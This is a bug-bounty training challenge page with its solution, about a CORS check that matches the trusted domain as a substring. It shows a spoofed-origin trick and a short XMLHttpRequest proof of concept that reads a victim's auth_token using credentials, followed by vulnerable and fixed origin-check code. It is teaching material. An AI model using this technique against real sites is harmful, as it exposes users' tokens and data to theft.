Important information
Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.
Failure to abide by the rules will put you at risk of being restricted from using our free challenges.
Checking if a whitelisted string is found is a bad approach
Easy
Cross Origin Resource Sharing
When you press Begin Challenge you'll be sent to https://www.bugbountytraining.com/challenges/challenge-16.php and will see {"auth_token":"anVzdF9hbl9leGFtcGxl"}.
An attacker may want to obtain this value from their victim, but how could they do this?
This is your objective. Find a way to obtain the information when your victim (you) visits your proof of concept.
Completed the challenge?
You can browse the intended solution to this challenge below.
Solution
Think about CORS!
Add the Origin: header with the value https://www.bugbountytraining.com and you'll see:
Access-Control-Allow-Origin: https://www.bugbountytraining.com
The code is only checking if this domain is found somewhere in the Origin value (a substring match, not an exact match), meaning you can use Origin: https://www.bugbountytraining.yourdomain.com/ (the example below uses www.bugbountytraining.com.zseano.com) and it will successfully reflect:
Access-Control-Allow-Origin: https://www.bugbountytraining.com.zseano.com
Add this POC to a domain that includes www.bugbountytraining.com (edit your hosts file and point it to your local IP, for example 127.0.0.1 www.bugbountytraining.com.zseano.com) and you'll see it alerts the auth_token:
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    // Fires once the cross-origin response has fully arrived
    if (this.readyState == 4 && this.status == 200) {
      alert(xhttp.responseText); // shows {"auth_token":...} to prove the read worked
    }
  };
  xhttp.open("GET", "https://www.bugbountytraining.com/challenges/challenge-16.php", true);
  // Send the victim's cookies with the request; the browser only exposes the
  // response when the server also answers with Access-Control-Allow-Credentials: true
  xhttp.withCredentials = true;
  xhttp.send();
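As an added example (not from the challenge page or the site's own code), here is the substring-style origin check the solution exploits next to an exact-match allowlist that closes the bypass; the function and constant names are hypothetical, the origin values are the ones used above.

```javascript
// Added example, not code from the challenge page. Names are hypothetical;
// the origin values are the ones the challenge writeup uses.

const ALLOWED_ORIGINS = new Set(["https://www.bugbountytraining.com"]);

// Vulnerable: reflects any Origin that merely *contains* the trusted host,
// so "https://www.bugbountytraining.com.zseano.com" is accepted.
function corsHeadersVulnerable(originHeader) {
  const headers = {};
  if (originHeader && originHeader.includes("www.bugbountytraining.com")) {
    headers["Access-Control-Allow-Origin"] = originHeader;
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

// Fixed: parse the Origin, serialise it back to scheme://host[:port], and
// require an exact allowlist match; anything else gets no CORS headers at all.
function corsHeadersFixed(originHeader) {
  const headers = { Vary: "Origin" }; // caches must key responses on Origin
  if (!originHeader) return headers;
  let origin;
  try {
    // URL#origin normalises case, default ports and any trailing path
    origin = new URL(originHeader).origin;
  } catch (e) {
    return headers; // malformed Origin value: treat as untrusted
  }
  // Opaque origins (file:, sandboxed frames, non-special schemes) serialise
  // as the string "null" and must never be matched or reflected
  if (origin === "null" || !ALLOWED_ORIGINS.has(origin)) return headers;
  headers["Access-Control-Allow-Origin"] = origin;
  headers["Access-Control-Allow-Credentials"] = "true";
  return headers;
}
```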